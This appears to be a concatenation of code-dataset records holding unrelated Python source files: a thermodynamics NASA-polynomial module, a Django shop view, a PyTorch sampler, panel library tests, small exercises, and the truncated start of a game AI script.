``PyMuTT.constants.R``\n for accepted units. If not specified, dimensionless units used.\n H_units : str\n Units to plot enthalpy. See ``PyMuTT.constants.R`` for accepted\n units but omit the '/K' (e.g. J/mol). If not specified,\n dimensionless units used.\n S_units : str\n Units to plot entropy. See ``PyMuTT.constants.R`` for accepted\n units. If not specified, dimensionless units used.\n G_units : str\n Units to plot Gibbs free energy. See ``PyMuTT.constants.R`` for\n accepted units but omit the '/K' (e.g. J/mol). If not specified,\n dimensionless units used.\n\n Returns:\n figure : `matplotlib.figure.Figure`_\n Figure\n axes : tuple of `matplotlib.axes.Axes.axis`_\n Axes of the plots.\n 0. Cp\n 1. H\n 2. S\n 3. G\n \"\"\"\n if T_low is None:\n T_low = self.T_low\n if T_high is None:\n T_high = self.T_high\n Ts = np.linspace(T_low, T_high)\n\n f, ax = plt.subplots(4, sharex=True)\n '''\n Heat Capacity\n '''\n ax[0].set_title('Specie: {}'.format(self.name))\n Ts, Cp_plot_thermo_model, Cp_plot_empirical = self.compare_CpoR(Ts=Ts)\n if Cp_units is None:\n ax[0].set_ylabel('Cp/R')\n else:\n ax[0].set_ylabel('Cp ({})'.format(Cp_units))\n Cp_plot_thermo_model *= c.R(Cp_units)\n Cp_plot_empirical *= c.R(Cp_units)\n\n ax[0].plot(Ts, Cp_plot_thermo_model, 'r-', label = 'Stat Mech Model')\n ax[0].plot(Ts, Cp_plot_empirical, 'b-', label = 'Empirical Model')\n ax[0].legend()\n\n '''\n Enthalpy\n '''\n Ts, H_plot_thermo_model, H_plot_empirical = self.compare_HoRT(Ts=Ts)\n\n if H_units is None:\n ax[1].set_ylabel('H/RT')\n else:\n ax[1].set_ylabel('H ({})'.format(H_units))\n H_plot_thermo_model *= c.R('{}/K'.format(H_units)) * Ts\n H_plot_empirical *= c.R('{}/K'.format(H_units)) * Ts\n ax[1].plot(Ts, H_plot_thermo_model, 'r-')\n ax[1].plot(Ts, H_plot_empirical, 'b-')\n\n '''\n Entropy\n '''\n Ts, S_plot_thermo_model, S_plot_empirical = self.compare_SoR(Ts=Ts)\n if S_units is None:\n ax[2].set_ylabel('S/R')\n else:\n ax[2].set_ylabel('S ({})'.format(S_units))\n S_plot_thermo_model *= c.R(S_units)\n S_plot_empirical *= c.R(S_units)\n ax[2].plot(Ts, S_plot_thermo_model, 'r-')\n ax[2].plot(Ts, S_plot_empirical, 'b-')\n\n '''\n Gibbs energy\n '''\n ax[3].set_xlabel('Temperature (K)')\n Ts, G_plot_thermo_model, G_plot_empirical = self.compare_GoRT(Ts=Ts)\n if G_units is None:\n ax[3].set_ylabel('G/RT')\n else:\n ax[3].set_ylabel('G ({})'.format(G_units))\n G_plot_thermo_model *= c.R('{}/K'.format(G_units)) * Ts\n G_plot_empirical *= c.R('{}/K'.format(G_units)) * Ts\n ax[3].plot(Ts, G_plot_thermo_model, 'r-')\n ax[3].plot(Ts, G_plot_empirical, 'b-')\n\n return f, ax\n\n\n def compare_CpoR(self, Ts=None):\n \"\"\"Compares the dimensionless heat capacity of the statistical model\n and the empirical model\n\n Parameters\n ----------\n Ts : (N,) `numpy.ndarray`_ or float, optional\n Temperatures (in K) to calculate CpoR. If None, generates\n a list of temperatures between self.T_low and self.T_high\n Returns\n -------\n Ts : (N,) `numpy.ndarray`_\n Temperatures in K\n CpoR_statmech : (N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of statistical thermodynamic model\n CpoR_empirical :((N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of empirical model\n \"\"\"\n if Ts is None:\n Ts = np.linspace(self.T_low, self.T_high)\n\n CpoR_statmech = np.array(map(self.thermo_model.get_CpoR, Ts))\n CpoR_empirical = np.array(map(self.get_CpoR, Ts))\n\n return (Ts, CpoR_statmech, CpoR_empirical)\n\n def compare_HoRT(self, Ts=None):\n \"\"\"Compares the dimensionless enthalpy of the statistical model and\n the empirical model\n\n Parameters\n ----------\n Ts : (N,) `numpy.ndarray`_ or float, optional\n Temperatures (in K) to calculate CpoR. If None, generates a\n list of temperatures between self.T_low and self.T_high\n Returns\n -------\n Ts : (N,) `numpy.ndarray`_ or float\n Temperatures in K\n CpoR_statmech : (N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of statistical thermodynamic model\n CpoR_empirical :((N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of empirical model\n \"\"\"\n if Ts is None:\n Ts = np.linspace(self.T_low, self.T_high)\n\n if self.references is not None:\n H_offset = np.array(\n self.references.get_HoRT_offset(elements=self.elements, Ts=Ts))\n else:\n H_offset = np.zeros_like(Ts)\n\n HoRT_statmech = np.array(map(self.thermo_model.get_HoRT, Ts)) + H_offset\n HoRT_empirical = np.array(map(self.get_HoRT, Ts))\n\n return (Ts, HoRT_statmech, HoRT_empirical)\n\n def compare_SoR(self, Ts = None):\n \"\"\"Compares the dimensionless entropy of the statistical model and\n the empirical model\n\n Parameters\n ----------\n Ts : (N,) `numpy.ndarray`_ or float, optional\n Temperatures (in K) to calculate CpoR. If None, generates a\n list of temperatures between self.T_low and self.T_high\n Returns\n -------\n Ts : (N,) `numpy.ndarray`_ or float\n Temperatures in K\n CpoR_statmech : (N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of statistical thermodynamic model\n CpoR_empirical :((N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of empirical model\n \"\"\"\n if Ts is None:\n Ts = np.linspace(self.T_low, self.T_high)\n\n SoR_statmech = np.array(map(self.thermo_model.get_SoR, Ts))\n SoR_empirical = np.array(map(self.get_SoR, Ts))\n\n return (Ts, SoR_statmech, SoR_empirical)\n\n def compare_GoRT(self, Ts = None):\n \"\"\"Compares the dimensionless Gibbs energy of the statistical model\n and the empirical model\n\n Parameters\n ----------\n Ts : (N,) `numpy.ndarray`_ or float, optional\n Temperatures (in K) to calculate CpoR. If None, generates a\n list of temperatures between self.T_low and self.T_high\n Returns\n -------\n Ts : (N,) `numpy.ndarray`_ or float\n Temperatures in K\n CpoR_statmech : (N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of statistical thermodynamic model\n CpoR_empirical : (N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of empirical model\n \"\"\"\n if Ts is None:\n Ts = np.linspace(self.T_low, self.T_high)\n\n if self.references is not None:\n offsets = self.references.get_HoRT_offset(elements=self.elements,\n Ts=Ts)\n else:\n offsets = np.zeros_like(Ts)\n\n GoRT_statmech = np.array(map(self.thermo_model.get_GoRT, Ts)) + offsets\n GoRT_empirical = np.array(map(self.get_GoRT, Ts))\n\n return (Ts, GoRT_statmech, GoRT_empirical)\n\n\nclass Nasa(BaseThermo):\n \"\"\"Stores the information for an individual nasa specie\n Inherits from PyMuTT.models.empirical.BaseThermo\n\n The thermodynamic properties are calculated using the following form:\n\n :math:`\\\\frac {Cp} {R} = a_{1} + a_{2} T + a_{3} T^{2} + a_{4} T^{3} + a_{5} T^{4}`\n\n :math:`\\\\frac {H} {RT} = a_{1} + a_{2} \\\\frac {T} {2} + a_{3} \\\\frac {T^{2}} {3} + a_{4} \\\\frac {T^{3}} {4} + a_{5} \\\\frac {T^{4}} {5} + a_{6} \\\\frac {1} {T}`\n\n :math:`\\\\frac {S} {R} = a_{1} \\\\ln {T} + a_{2} T + a_{3} \\\\frac {T^{2}} {2} + a_{4} \\\\frac {T^{3}} {3} + a_{5} \\\\frac {T^{4}} {4} + a_{7}`\n\n Attributes\n ----------\n T_low : float\n Lower temperature bound (in K)\n T_mid : float\n Middle temperature bound (in K)\n T_high : float\n High temperature bound (in K)\n a_low : (7,) `numpy.ndarray_`\n NASA polynomial to use between T_low and T_mid\n a_high : (7,) `numpy.ndarray_`\n NASA polynomial to use between T_mid and T_high\n \"\"\"\n def __init__(self, T_low, T_mid, T_high, T_ref=c.T0('K'),\n HoRT_ref=None, SoR_ref=None, **kwargs):\n super().__init__(T_ref=T_ref, HoRT_ref=HoRT_ref, **kwargs)\n\n self.T_low = T_low\n self.T_high = T_high\n self.T_mid = T_mid\n\n self.fit(HoRT_dft=HoRT_ref, SoR_ref=SoR_ref)\n\n def get_a(self, temperature):\n \"\"\"Returns the correct polynomial range based on T_low, T_mid and T_high\n\n Parameters\n ----------\n temperature : float\n Temperature in K\n Returns\n -------\n a : (7,) `numpy.ndarray`_\n NASA polynomial coefficients\n \"\"\"\n if temperature < self.T_mid:\n if temperature < self.T_low:\n warn('Temperature below T_low for {}'.format(self.name), RuntimeWarning)\n return self.a_low\n else:\n if temperature > self.T_high:\n warn('Temperature above T_high for {}'.format(self.name), RuntimeWarning)\n return self.a_high\n\n def get_CpoR(self, temperature):\n \"\"\"Calculate the dimensionless heat capacity\n\n Parameters\n ----------\n temperature : float\n Temperature in K\n Returns\n -------\n CpoR : float\n Dimensionless heat capacity\n \"\"\"\n T = temperature\n a = self.get_a(T)\n T_arr = np.array([1., T, T**2, T**3, T**4, 0., 0.])\n return np.dot(a, T_arr)\n\n def get_HoRT(self, temperature):\n \"\"\"Calculate the dimensionless enthalpy\n\n Parameters\n ----------\n temperature : float\n Temperature in K\n Returns\n -------\n HoRT : float\n Dimensionless enthalpy\n \"\"\"\n T = temperature\n a = self.get_a(T)\n T_arr = np.array([1., T/2., (T**2)/3., (T**3)/4., (T**4)/5., 1./T, 0.])\n return np.dot(a, T_arr)\n\n def get_SoR(self, temperature):\n \"\"\"Calculate the dimensionless entropy\n\n Parameters\n ----------\n temperature : float\n Temperature in K\n Returns\n -------\n SoR : float\n Dimensionless entropy\n \"\"\"\n T = temperature\n a = self.get_a(T)\n T_arr = np.array([np.log(T), T, (T**2)/2., (T**3)/3., (T**4)/4., 0., 1.])\n return np.dot(a, T_arr)\n\n return SoR\n\n def get_GoRT(self, temperature):\n \"\"\"Calculate the dimensionless Gibbs free energy\n\n Parameters\n ----------\n temperature : float or (N,) `numpy.ndarray`_\n Temperature(s) in K\n Returns\n -------\n GoRT : float or (N,) `numpy.ndarray`_\n Dimensionless Gibbs free energy\n \"\"\"\n return self.get_HoRT(temperature) - self.get_SoR(temperature)\n\n def fit(self, T_low, T_high, T_ref=None,\n HoRT_dft=None, HoRT_ref=None, SoR_ref=None, references=None):\n \"\"\"Calculates the NASA polynomials using internal attributes\n\n Parameters\n ----------\n T_low : float\n Lower temperature to fit. If not specified, uses T_low attribute\n T_high : float\n High temperature to fit. If not specified, uses T_high attribute\n T_ref : float\n Reference temperature in K used fitting empirical coefficients.\n If not specified, uses T_ref attribute\n HoRT_dft : float\n Dimensionless enthalpy calculated using DFT that corresponds\n to T_ref. If not specified, uses HoRT_dft attribute. If the\n HoRT_dft attribute is not specified, uses\n self.thermo_model.get_HoRT\n HoRT_ref : float\n Dimensionless reference enthalpy that corresponds to T_ref.\n If this is specified, uses this value when fitting a_low[5]\n and a_high[5] instead of HoRT_dft and references\n SoR_ref : float\n Dimensionless entropy that corresponds to T_ref. If not\n specified, uses self.thermo_model.get_SoR\n references : ``PyMuTT.models.empirical.References``\n Contains references to calculate HoRT_ref. If not specified\n then HoRT_dft will be used without adjustment.\n \"\"\"\n\n '''\n Processing inputs\n '''\n\n #Get temperatures and heat capacity data\n Ts = np.linspace(self.T_low, self.T_high)\n CpoR = np.array(map(self.thermo_model.get_CpoR, Ts))\n\n #Get reference temperature\n if T_ref is None:\n T_ref = self.T_ref\n\n #Get reference enthalpy\n if HoRT_dft is None:\n if self.HoRT_dft is None:\n self.HoRT_dft = self.thermo_model.get_HoRT(T_ref)\n HoRT_dft = self.HoRT_dft\n\n #Get reference entropy\n if SoR_ref is None:\n SoR_ref = self.thermo_model.get_SoR(T_ref)\n\n #Get references\n if references is not None:\n self.references = references\n\n #Set HoRT_ref\n #If references specified\n if HoRT_ref is not None:\n self.HoRT_ref = HoRT_ref\n else:\n if self.references is not None:\n self.HoRT_ref = HoRT_dft + self.references.get_HoRT_offset(\n self.elements, Ts=self.T_ref)\n #If dimensionless DFT enthalpy specified\n elif HoRT_dft is not None:\n self.HoRT_ref = HoRT_dft\n HoRT_ref = self.HoRT_ref\n\n #Reinitialize coefficients\n self.a_low = np.zeros(7)\n self.a_high = np.zeros(7)\n\n '''\n Processing data\n '''\n self.fit_CpoR(Ts, CpoR)\n self.fit_HoRT(T_ref, HoRT_ref)\n self.fit_SoR(T_ref, SoR_ref)\n\n def fit_CpoR(self, Ts, CpoR):\n \"\"\"Fit a[0]-a[4] coefficients in a_low and a_high attributes\n given the dimensionless heat capacity data\n\n Parameters\n ----------\n Ts : (N,) `numpy.ndarray_`\n Temperatures in K\n CpoR : (N,) `numpy.ndarray_`\n Dimensionless heat capacity\n \"\"\"\n #If the Cp/R does not vary with temperature (occurs when no\n # vibrational frequencies are listed)\n if (np.mean(CpoR) < 1e-6 and np.isnan(variation(CpoR))) or \\\n variation(CpoR) < 1e-3 or all(np.isnan(CpoR)):\n self.T_mid = Ts[int(len(Ts)/2)]\n self.a_low = np.zeros(7)\n self.a_high = np.zeros(7)\n else:\n max_R2 = -1\n R2 = np.zeros_like(Ts)\n for i, T_mid in enumerate(Ts):\n #Need at least 5 points to fit the polynomial\n if i > 5 and i < (len(Ts)-6):\n #Separate the temperature and heat capacities into low and high range\n (R2[i], a_low, a_high) = self._get_CpoR_R2(\n Ts=Ts, CpoR=CpoR, i_mid=i)\n max_R2 = max(R2)\n max_i = np.where(max_R2 == R2)[0][0]\n (max_R2, a_low_rev, a_high_rev) = self._get_CpoR_R2(\n Ts=Ts, CpoR=CpoR, i_mid=max_i)\n empty_arr = np.zeros(2)\n self.T_mid = Ts[max_i]\n self.a_low = np.concatenate((a_low_rev[::-1], empty_arr))\n self.a_high = np.concatenate((a_high_rev[::-1], empty_arr))\n\n def _get_CpoR_R2(self, Ts, CpoR, i_mid):\n \"\"\"Calculate the R2 polynomial regression value.\n\n Parameters\n ----------\n Ts : (N,) `numpy.ndarray_`\n Temperatures (K) to fit the polynomial\n CpoR : (N,) `numpy.ndarray_`\n Dimensionless heat capacities that correspond to T array\n i_mid : int\n Index that splits T and CpoR arrays into a lower and higher range\n Returns\n -------\n R2 : float)\n R2 value resulting from NASA polynomial fit to T and CpoR\n p_low : (5,) `numpy.ndarray_`\n Polynomial corresponding to lower range of data\n p_high : (5,) `numpy.ndarray_`\n Polynomial corresponding to high range of data\n \"\"\"\n T_low = Ts[:i_mid]\n CpoR_low = CpoR[:i_mid]\n T_high = Ts[i_mid:]\n CpoR_high = CpoR[i_mid:]\n #Fit the polynomial\n p_low = np.polyfit(x = T_low, y = CpoR_low, deg = 4)\n p_high = np.polyfit(x = T_high, y = CpoR_high, deg = 4)\n\n #Find the R2\n CpoR_low_fit = np.polyval(p_low, T_low)\n CpoR_high_fit = np.polyval(p_high, T_high)\n CpoR_fit = np.concatenate((CpoR_low_fit, CpoR_high_fit))\n CpoR_mean = np.mean(CpoR)\n ss_reg = np.sum((CpoR_fit - CpoR_mean)**2)\n ss_tot = np.sum((CpoR - CpoR_mean)**2)\n R2 = ss_reg / ss_tot\n\n return (R2, p_low, p_high)\n\n def fit_HoRT(self, T_ref, HoRT_ref):\n \"\"\"Fit a[5] coefficient in a_low and a_high attributes given the dimensionless enthalpy\n\n Parameters\n ----------\n T_ref : float\n Reference temperature in K\n HoRT_ref : float\n Reference dimensionless enthalpy\n \"\"\"\n T_mid = self.T_mid\n a6_low = (HoRT_ref - get_nasa_HoRT(a=self.a_low, T=T_ref))*T_ref\n a6_high = (HoRT_ref - get_nasa_HoRT(a=self.a_high, T=T_ref))*T_ref\n\n #Correcting for offset\n H_low_last_T = get_nasa_HoRT(a=self.a_low, T=T_mid) + a6_low/T_mid\n H_high_first_T = get_nasa_HoRT(a=self.a_high, T=T_mid) + a6_high/T_mid\n H_offset = H_low_last_T - H_high_first_T\n\n self.a_low[5] = a6_low\n self.a_high[5] = T_mid * (a6_high/T_mid + H_offset)\n\n def fit_SoR(self, T_ref, SoR_ref):\n \"\"\"Fit a[6] coefficient in a_low and a_high attributes given the\n dimensionless entropy\n\n Parameters\n ----------\n T_ref : float\n Reference temperature in K\n SoR_ref : float\n Reference dimensionless entropy\n \"\"\"\n T_mid = self.T_mid\n a7_low = SoR_ref - get_nasa_SoR(a=self.a_low, T=T_ref)\n a7_high = SoR_ref - get_nasa_SoR(a=self.a_high, T=T_ref)\n\n #Correcting for offset\n S_low_last_T = get_nasa_SoR(a=self.a_low, T=T_mid) + a7_low\n S_high_first_T = get_nasa_SoR(a=self.a_high, T=T_mid) + a7_high\n S_offset = S_low_last_T - S_high_first_T\n\n self.a_low[6] = a7_low\n self.a_high[6] = a7_high + S_offset\n\n\ndef get_nasa_CpoR(a, T):\n \"\"\"Calculate the dimensionless heat capacity using NASA polynomial form\n\n Parameters\n ----------\n a : (7,) `numpy.ndarray_`\n Coefficients of NASA polynomial\n T : float\n Temperature in K\n Returns\n -------\n CpoR: float\n Dimensionless heat capacity\n \"\"\"\n T_arr = np.array([1., T, T**2, T**3, T**4, 0., 0.])\n return np.dot(a, T_arr)\n\n\ndef get_nasa_HoRT(a, T):\n \"\"\"Calculate the dimensionless enthalpy using NASA polynomial form\n\n Parameters\n ----------\n a : (7,) `numpy.ndarray_`\n Coefficients of NASA polynomial\n T : float\n Temperature in K\n Returns\n -------\n HoRT : float\n Dimensionless enthalpy\n \"\"\"\n T_arr = np.array([1., T/2., (T**2)/3., (T**3)/4., (T**4)/5., 1./T, 0.])\n return np.dot(a, T_arr)\n\n\ndef get_nasa_SoR(a, T):\n \"\"\"Calculate the dimensionless entropy using NASA polynomial form\n\n Parameters\n ----------\n a : (7,) `numpy.ndarray_`\n Coefficients of NASA polynomial\n T : float\n Temperature in K\n Returns\n -------\n SoR : float\n Dimensionless entropy\n \"\"\"\n T_arr = np.array([np.log(T), T, (T**2)/2., (T**3)/3., (T**4)/4., 0., 1.])\n return np.dot(a, T_arr)\n\n\ndef get_nasa_GoRT(a, T):\n \"\"\"Calculate the dimensionless Gibbs free energy using NASA polynomial form\n\n Parameters\n ----------\n a : (7,) `numpy.ndarray_`\n Coefficients of NASA polynomial\n T : float\n Temperature in K\n Returns\n -------\n GoRT : float\n Dimensionless entropy\n \"\"\"\n return get_nasa_HoRT(a=a, T=T)-get_nasa_SoR(a=a, T=T)\n","sub_path":"PyMuTT/models/empirical_model.py","file_name":"empirical_model.py","file_ext":"py","file_size_in_byte":31723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"273168420","text":"from django.shortcuts import render\nfrom django.core.mail import send_mail\nfrom django.http import HttpResponse\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom polls.models import Shopitem\nfrom os.path import normpath, basename\n\n\ndef viewIndex(request):\n return render(request, \"index.html\", {})\n\ndef viewBrowse(request, filter, page):\n if filter == 'all':\n items = Shopitem.objects.all()\n # NOTE to self. This is retarded\n elif filter == 'for_baby':\n coliere_bebici = Shopitem.objects.filter(item_type='ColierBebici')\n bratari = Shopitem.objects.filter(item_type='Bratari')\n jucarii = Shopitem.objects.filter(item_type='Jucarii')\n materiale = Shopitem.objects.filter(item_type='Materiale')\n items = coliere_bebici | bratari | jucarii | materiale\n elif filter == 'for_mommy':\n coliere_mamici = Shopitem.objects.filter(item_type='ColierMamici')\n culori = Shopitem.objects.filter(item_type='Culori')\n items = coliere_mamici | culori\n else:\n items = Shopitem.objects.filter(item_type=filter)\n\n page = request.GET.get('page')\n paginator = Paginator(items, 9)\n\n try:\n render_items = paginator.page(page)\n except PageNotAnInteger:\n render_items = paginator.page(1)\n except EmptyPage:\n render_items = paginator.page(paginator.num_pages)\n\n return render(request, \"browse.html\", {\"items\": render_items})\n\ndef viewAboutUs(request):\n return render(request, \"about-us.html\", {})\n\ndef viewItemDetails(request, item_name):\n # Get item from the databases\n item = Shopitem.objects.get(name=item_name)\n return render(request, \"item-details.html\", {\"item\": item})\n\ndef viewGallery(request):\n return render(request, \"gallery.html\", {})\n\ndef viewArticle(request, id):\n text = \"Displaying article Number : %s\"%id\n return HttpResponse(text)\n","sub_path":"colierele/polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"347769274","text":"import numpy as np\n\nfrom torch.utils.data.sampler import Sampler \n\nclass ShopSampler(Sampler):\n def __init__(self, labels, batch_size, maxiter):\n self.labels = np.array(labels)\n self.labels_unique = np.unique(labels)\n self.batch_size = batch_size\n self.maxiter = maxiter\n \n def __iter__(self):\n for i in range(self.__len__()):\n labels_in_batch = set()\n inds = np.array([], dtype=np.int)\n\n while inds.shape[0] < self.batch_size:\n sample_label = np.random.choice(self.labels_unique)\n if sample_label in labels_in_batch:\n continue\n\n labels_in_batch.add(sample_label)\n sample_label_ids = np.argwhere(np.in1d(self.labels, sample_label)).reshape(-1)\n subsample = np.random.permutation(sample_label_ids)\n subsize = len(subsample)\n if subsize <= 1:\n continue\n subsample_size = np.random.choice(range(subsize//2, subsize+1))\n subsample = subsample[:subsample_size]\n inds = np.append(inds, subsample)\n\n inds = inds[:self.batch_size]\n inds = np.random.permutation(inds)\n yield list(inds)\n\n def __len__(self):\n return self.maxiter","sub_path":"samplers_shop.py","file_name":"samplers_shop.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"5311702","text":"import time\nfrom image_server import ImageServer\nfrom lat_lng import LatLng\nfrom neighborhood import Neighborhood\nfrom place_data_server import PlaceDataServer\n\n\nclass Runner:\n\n def run(self):\n place_data_server = PlaceDataServer()\n try:\n place_data_server.initialize_server(\"place_data.csv\")\n except IOError as pds_io_exception:\n print(\"Exception thrown populating PDS data: %s\" % pds_io_exception)\n\n image_server = ImageServer()\n try:\n image_server.initialize_server(\"image_data.csv\")\n except IOError as is_io_exception:\n print(\"Exception thrown populating IS data: %s\" % is_io_exception)\n\n neighborhood = Neighborhood(place_data_server, image_server)\n\n while True:\n print(\"~~~~~~~~~~~A new Server is running.!!\")\n places_found = place_data_server.get_place_data_from_name(\"Starbucks\")\n for place in places_found:\n print(\"***: %s\" % place)\n print(\"***: %s\" % place_data_server.get_place_data(\n \"Starbucks\", LatLng(100, -200)))\n print(\"***: %s\" % image_server.get_image_for_place(\n \"Starbucks\", LatLng(100, -200)))\n print(\"*** get_nearby_places: %s\" % place_data_server.get_nearby_places(\n LatLng(100, -200), 2))\n print(\"*** get_places: %s\" % neighborhood.get_places(LatLng(100, -200), 1))\n\n # Feel free to add more print statements here in order to test your code\n # and see how things are working.\n time.sleep(11)\n\n\nif __name__ == \"__main__\":\n try:\n Runner().run()\n except KeyboardInterrupt:\n print(\"~~~~~~~~~~~Server stops.\")\n","sub_path":"medium/mediumCode/c/pocketgems/neighborhood_python/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"587289173","text":"''' \nWrite a program that reads an hourly wage and average number of hours worked per week \nand displays the total yearly pay.\n'''\n\nhourly_wage = int(input(\"What's your hourly wage?: \"))\naverage_hours = int(input(\"How many hours do you usually work per week?: \"))\n\n\nweekly_wage = hourly_wage * average_hours\n\nannual_wage = weekly_wage * 52\n\nprint(\"Your annual wage is\", annual_wage)","sub_path":"python/think_like_a_programmer/ch3-variables/wage_calculator.py","file_name":"wage_calculator.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"89482401","text":"from __future__ import absolute_import\n\nfrom base64 import b64decode\nimport pytest\n\nfrom bokeh.models import (Div, Row as BkRow, WidgetBox as BkWidgetBox,\n GlyphRenderer, Circle, Line)\nfrom bokeh.plotting import Figure\nfrom panel.pane import (Pane, PaneBase, Bokeh, HoloViews, Matplotlib,\n HTML, Str, PNG, JPG, GIF)\n\ntry:\n import holoviews as hv\nexcept:\n hv = None\nhv_available = pytest.mark.skipif(hv is None, reason=\"requires holoviews\")\n\ntry:\n import matplotlib as mpl\n mpl.use('Agg')\nexcept:\n mpl = None\nmpl_available = pytest.mark.skipif(mpl is None, reason=\"requires matplotlib\")\n\nfrom .fixtures import mpl_figure\nfrom .test_layout import get_div\n\n\ndef test_get_bokeh_pane_type():\n div = Div()\n assert PaneBase.get_pane_type(div) is Bokeh\n\n\ndef test_bokeh_pane(document, comm):\n div = Div()\n pane = Pane(div)\n\n # Create pane\n row = pane._get_root(document, comm=comm)\n assert isinstance(row, BkRow)\n assert len(row.children) == 1\n model = row.children[0]\n assert model.ref['id'] in pane._callbacks\n assert get_div(model) is div\n\n # Replace Pane.object\n div2 = Div()\n pane.object = div2\n new_model = row.children[0]\n assert get_div(new_model) is div2\n assert new_model.ref['id'] in pane._callbacks\n assert model.ref['id'] not in pane._callbacks\n\n # Cleanup\n pane._cleanup(new_model)\n assert pane._callbacks == {}\n\n\n@hv_available\ndef test_get_holoviews_pane_type():\n curve = hv.Curve([1, 2, 3])\n assert PaneBase.get_pane_type(curve) is HoloViews\n\n\n@pytest.mark.usefixtures(\"hv_mpl\")\n@mpl_available\n@hv_available\ndef test_holoviews_pane_mpl_renderer(document, comm):\n curve = hv.Curve([1, 2, 3])\n pane = Pane(curve)\n\n # Create pane\n row = pane._get_root(document, comm=comm)\n assert isinstance(row, BkRow)\n assert len(row.children) == 1\n assert len(pane._callbacks) == 1\n model = row.children[0]\n assert isinstance(model, BkWidgetBox)\n div = model.children[0]\n assert isinstance(div, Div)\n assert 'Test\") is HTML\n\n\ndef test_html_pane(document, comm):\n pane = Pane(\"

Test

\")\n\n # Create pane\n row = pane._get_root(document, comm=comm)\n assert isinstance(row, BkRow)\n assert len(row.children) == 1\n model = row.children[0]\n assert model.ref['id'] in pane._callbacks\n div = get_div(model)\n assert div.text == \"

Test

\"\n\n # Replace Pane.object\n pane.object = \"

Test

\"\n model = row.children[0]\n assert div is get_div(model)\n assert model.ref['id'] in pane._callbacks\n assert div.text == \"

Test

\"\n\n # Cleanup\n pane._cleanup(model)\n assert pane._callbacks == {}\n\n\ndef test_string_pane(document, comm):\n pane = Str(\"

Test

\")\n\n # Create pane\n row = pane._get_root(document, comm=comm)\n assert isinstance(row, BkRow)\n assert len(row.children) == 1\n model = row.children[0]\n assert model.ref['id'] in pane._callbacks\n div = get_div(model)\n assert div.text == \"
<h1>Test</h1>
\"\n\n # Replace Pane.object\n pane.object = \"

Test

\"\n model = row.children[0]\n assert div is get_div(model)\n assert model.ref['id'] in pane._callbacks\n assert div.text == \"
<h2>Test</h2>
\"\n\n # Cleanup\n pane._cleanup(model)\n assert pane._callbacks == {}\n\n\ntwopixel = dict(\\\n gif = b'R0lGODlhAgABAPAAAEQ6Q2NYYCH5BAAAAAAAIf8LSW1hZ2VNYWdpY2sNZ2FtbWE' + \\\n b'9MC40NTQ1NQAsAAAAAAIAAQAAAgIMCgA7',\n png = b'iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAYAAAD0In+KAAAAFElEQVQIHQEJAPb' + \\\n b'/AWNYYP/h4uMAFL0EwlEn99gAAAAASUVORK5CYII=',\n jpg = b'/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQE' + \\\n b'BAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/2wBDAQ' + \\\n b'EBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA' + \\\n b'QEBAQEBAQEBAQEBAQEBAQH/wAARCAABAAIDAREAAhEBAxEB/8QAFAABAAAAAAAA' + \\\n b'AAAAAAAAAAAACf/EABoQAAEFAQAAAAAAAAAAAAAAAAYABAU2dbX/xAAVAQEBAAA' + \\\n b'AAAAAAAAAAAAAAAAFBv/EABkRAAEFAAAAAAAAAAAAAAAAAAEAAjFxsf/aAAwDAQ' + \\\n b'ACEQMRAD8AA0qs5HvTHQcJdsChioXSbOr/2Q==')\n\ndef test_imgshape():\n for t in [PNG, JPG, GIF]:\n w,h = t._imgshape(b64decode(twopixel[t.name.lower()]))\n assert w == 2\n assert h == 1\n","sub_path":"panel/tests/test_panes.py","file_name":"test_panes.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"383527587","text":"#!/usr/bin/env python3\n\"\"\" defines function that concatenates two 2D matrices along an axis \"\"\"\n\n\ndef cat_matrices2D(mat1, mat2, axis=0):\n \"\"\" returns new matrix that is the concatenation of two 2D matrices \"\"\"\n if axis is 0:\n # concatenate rows\n for row in mat1:\n mat1_columns = len(row)\n for row in mat2:\n mat2_columns = len(row)\n if mat1_columns != mat2_columns:\n return None\n cat_matrix = []\n for index1, row in enumerate(mat1):\n cat_matrix.append([])\n for i in row:\n cat_matrix[index1].append(i)\n index1 += 1\n for index2, row in enumerate(mat2):\n cat_matrix.append([])\n for i in row:\n cat_matrix[index1 + index2].append(i)\n return cat_matrix\n if axis is 1:\n # concatenates columns\n if len(mat1) != len(mat2):\n return None\n cat_matrix = []\n for index, row in enumerate(mat1):\n cat_matrix.append([])\n for i in mat1[index]:\n cat_matrix[index].append(i)\n for i in mat2[index]:\n cat_matrix[index].append(i)\n return cat_matrix\n return None\n","sub_path":"math/0x00-linear_algebra/7-gettin_cozy.py","file_name":"7-gettin_cozy.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"430673196","text":"import App\n\ndef CreateAI(pShip):\n\t#########################################\n\t# Creating PlainAI StayBoyStay at (114, 